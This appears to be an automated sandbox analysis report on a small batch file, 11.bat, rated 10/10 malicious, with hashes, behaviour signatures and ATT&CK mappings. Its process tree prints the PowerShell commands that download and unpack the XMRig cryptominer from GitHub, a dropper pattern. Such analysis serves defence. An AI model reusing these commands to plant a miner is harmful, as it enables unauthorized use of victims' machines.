Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    11.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\11.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2676

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CQHG7TXG0A0X6TP8GHDH.temp
    Filesize

    7KB

    MD5

    2fba1e1bd701c197aa195dd0347110b4

    SHA1

    911cb5ece0e68027d93c8b728ec82e21e3efb709

    SHA256

    e85617dc23dc872a30de5f787295e57b5e19a1d069ba105fb46349a1f72e91c8

    SHA512

    0eeeb33fd778eea788fbedce6e35163f5bdeb917a85257e5abc18bfbb45163380371b0b31420b217547ad403bc0073ebf7c14c12834d51aec3a94ca56c08edd9

  • memory/2140-4-0x000007FEF5B6E000-0x000007FEF5B6F000-memory.dmp
    Filesize

    4KB

  • memory/2140-6-0x0000000001F50000-0x0000000001F58000-memory.dmp
    Filesize

    32KB

  • memory/2140-7-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2140-8-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2140-5-0x000000001B770000-0x000000001BA52000-memory.dmp
    Filesize

    2.9MB

  • memory/2140-9-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2140-10-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2140-11-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2140-12-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp
    Filesize

    9.6MB

  • memory/2676-19-0x0000000001E10000-0x0000000001E18000-memory.dmp
    Filesize

    32KB

  • memory/2676-18-0x000000001B640000-0x000000001B922000-memory.dmp
    Filesize

    2.9MB